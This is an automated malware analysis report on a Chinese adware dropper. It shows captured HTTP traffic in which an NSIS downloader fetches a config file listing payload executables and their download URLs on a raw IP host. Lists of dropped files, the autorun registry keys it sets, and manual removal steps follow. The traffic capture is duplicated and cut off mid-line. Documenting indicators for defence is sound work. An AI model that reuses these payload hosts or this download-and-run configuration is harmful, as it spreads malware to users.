5 14:27:47 GMT..Content-Type: text/html;charset=utf-8..Transfer-Encodi
ng: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-
By: PHP/5.2.17p1..2..ok..0..


GET /db/apps.txt HTTP/1.0
Host: VVV.google.uscter.hk.moyan.cc
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Length: 1457
Content-Type: text/plain
Last-Modified: Fri, 09 Jan 2015 13:26:20 GMT
Accept-Ranges: bytes
ETag: "0a6c1daf2cd01:fe4"
Server: IIS
X-Powered-By: WAF/2.0
Date: Sun, 11 Jan 2015 14:27:18 GMT
Connection: close
/*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=hXXp://124.232.152.11
9:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=CreateShortcut.exe..cc=h
ttp://124.232.152.119:18168/db/CreateShortcut.zip..dd=..[ff3]..aa=....
..bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152.119:18168/db/ksimek
usu_zhim_007.zip..dd=..[ff5000]..aa=uc..bb=Browser_V4.0.3214.0_r_4067_
(Build14122211)_1420477202.exe..cc=hXXp://ly.jyfb.net/air/aicc/check.p
hp?id=259..dd=..[ff11]..aa=mp..bb=-2203_1_mp.exe..cc=hXXp://124.232.15
2.119:18168/db/-2203_1_mp.zip..dd=..[ff12]..aa=tqrl..bb=tqrl_93_2508.e
xe..cc=hXXp://124.232.152.119:18168/db/tqrl_93_2508.zip..dd=..[ff13]..
aa=......bb=weather_b_90045.exe..cc=hXXp://124.232.152.119:18168/db/we
ather_b_90045.zip..dd=..[ff14][email protected].
.cc=hXXp://124.232.152.119:18168/db/IQIYIsetup_qHTTP/1.1 200 OK..Conte
nt-Length: 1457..Content-Type: text/plain..Last-Modified: Fri, 09 Jan
2015 13:26:20 GMT..Accept-Ranges: bytes..ETag: "0a6c1daf2cd01:fe4"..Se
rver: IIS..X-Powered-By: WAF/2.0..Date: Sun, 11 Jan 2015 14:27:18 GMT.
.Connection: close../*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=h
ttp://124.232.152.119:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=Crea
teShortcut.exe..cc=hXXp://124.232.152.119:18168/db/CreateShortcut.zip.
.dd=..[ff3]..aa=......bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152
.119:18168/db/ksimekusu_zhim_007.zip..dd=..[ff5000]..aa=uc..bb=Browser
_V4.0.3214.0_r_4067_(Build14122211)_1420477202.exe..cc=hXXp://ly.jyfb.
net/air/aicc/check.php?id=259..dd=..[ff11]..aa=mp..bb=-2203_1_mp.e

<<< skipped >>>

The Malware connects to the servers at the following location(s):

%original file name%.exe_772:


KS1426.exe_2000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    install.exe:432
    CreateShortcut.exe:1284
    %original file name%.exe:772
    KS1426.exe:2000
    ksimekusu_zhim_007.exe:1896
    OneDay.exe:604

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %Program Files%\Favorite\ico\ay.ico (784 bytes)
    %Documents and Settings%\%current user%\Desktop\影视大全.lnk (1 bytes)
    %Program Files%\Favorite\ico\123.ico (3 bytes)
    %Program Files%\Favorite\ico\360.ico (784 bytes)
    %Documents and Settings%\%current user%\Desktop\搜狗网址导航.lnk (1 bytes)
    %Program Files%\Favorite\ico\tb1.ico (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
    %Documents and Settings%\%current user%\Desktop\hao123网址导航.lnk (1 bytes)
    %Program Files%\Favorite\ico\sg1.ico (9 bytes)
    %Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
    %Documents and Settings%\%current user%\Desktop\360网址导航.lnk (1 bytes)
    %Documents and Settings%\%current user%\Desktop\爱淘宝.lnk (1 bytes)
    %Program Files%\Favorite\ico\movie.ico (12536 bytes)
    %Program Files%\Favorite\ico\ie.ico (784 bytes)
    %Program Files%\Favorite\ico\23451.ico (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)
    %Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\中文之星双拼.ini (526 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
    %Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\bg_main.png (4 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\bg_status.png (4 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (812 bytes)
    %Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
    %Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\蓝天双拼.ini (912 bytes)
    %Documents and Settings%\%current user%\Application Data\kusuInput\phrase\我的短语.ini (24 bytes)
    %Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\拼音加加双拼.ini (538 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\theme.ini (2 bytes)
    %Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
    %Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\buttons.png (5 bytes)
    %Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
    %Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
    %Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\中文符号.ini (560 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\固顶字.ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\双拼.ini (1 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\智能ABC双拼.ini (686 bytes)
    %Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\DOS双拼.ini (674 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\修复.lnk (825 bytes)
    %Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
    %Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
    %Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\卸载.lnk (613 bytes)
    %System%\ksime.ime (126018 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\微软双拼.ini (682 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\phrase\系统短语库.ini (784 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\自然码双拼.ini (580 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
    %Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\line.png (143 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
